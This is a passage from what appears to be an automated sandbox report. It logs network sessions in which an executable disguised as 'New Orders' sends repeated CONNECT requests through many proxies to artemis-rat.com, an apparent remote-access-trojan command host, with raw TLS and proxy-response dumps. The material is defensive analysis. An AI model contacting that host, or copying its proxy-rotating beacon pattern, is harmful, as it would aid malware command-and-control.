                                                                                        671192.168.2.95190918.228.198.164807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.402172089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.728274107 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:42.803287983 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 5a 8e 05 7d af f2 4d f0 f3 0d d6 8c 75 1c 59 3f b7 f0 9c bf f5 ca 6b 4b a8 43 ab 1a 60 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e Z}MuY?kKC`*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:43.129005909 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 00 56 64 55 29 dc 35 d4 b8 50 5a 7a f3 6d 38 f3 2e 9d d0 47 47 ad f9 1e 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9VdU)5PZzm8.GGDOWNGRD0000*H010Uartemis-rat.com0240311145335Z260311145335Z010Uartemis-rat.com0"0*H0t71MAQ
                                                                                        Mar 11, 2024 16:16:43.175638914 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 2d 7a dc fb a7 8c c0 b6 b6 35 e6 db 55 bb a4 75 9e a2 6e 11 18 bc 06 d5 e0 ce c3 ee 92 cf 27 71 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 fb af 44 30 f9 5e 35 00 33 05 5f 9d 80 35 d7 f1 f9 09 97 46 a3
                                                                                        Data Ascii: %! -z5Uun'q(D0^53_5F0f'l
                                                                                        Mar 11, 2024 16:16:43.499948978 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 eb 94 79 55 4a 93 08 6e ae eb bc 05 c4 0b 4e 23 aa cb 75 01 f2 37 5a 6c 44 4c b3 ca 41 48 62 bf 34 55 ff d0 5a e8 96 67
                                                                                        Data Ascii: (yUJnN#u7ZlDLAHb4UZg


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        672192.168.2.951920217.23.11.194327087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.402386904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.702311993 CET226INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Length: 101
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                        Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        673192.168.2.95192793.190.142.57418907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.403347969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.698101997 CET226INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Length: 101
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                        Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        674192.168.2.951871185.217.143.23807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.406019926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        675192.168.2.95187538.54.16.97807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.412679911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.903207064 CET176INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Length: 19
                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                        Data Ascii: 404 page not found


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        676192.168.2.95171431.148.207.153807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.413321018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        677192.168.2.951503120.234.203.17190027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.417150974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.092772007 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        678192.168.2.951865190.2.110.741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.421638012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        679192.168.2.952049172.67.182.22807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.422099113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.576776981 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        680192.168.2.952066172.67.182.48807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.425468922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.579994917 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        681192.168.2.951889143.64.8.2180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.425559998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.976501942 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        682192.168.2.951945185.103.101.39100517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.426597118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:25.180808067 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        683192.168.2.951944160.153.245.187351387672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.428807020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        684192.168.2.952102104.19.138.4807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.429071903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.583096981 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        685192.168.2.9510695.252.23.24910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.431747913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        686192.168.2.9517475.44.42.115583867672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.431941986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        687192.168.2.951962144.76.96.18055667672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.434154987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835293055 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        688192.168.2.951172162.241.207.217807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.440464973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476433992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477689981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.570373058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.663891077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.663753986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.663724899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
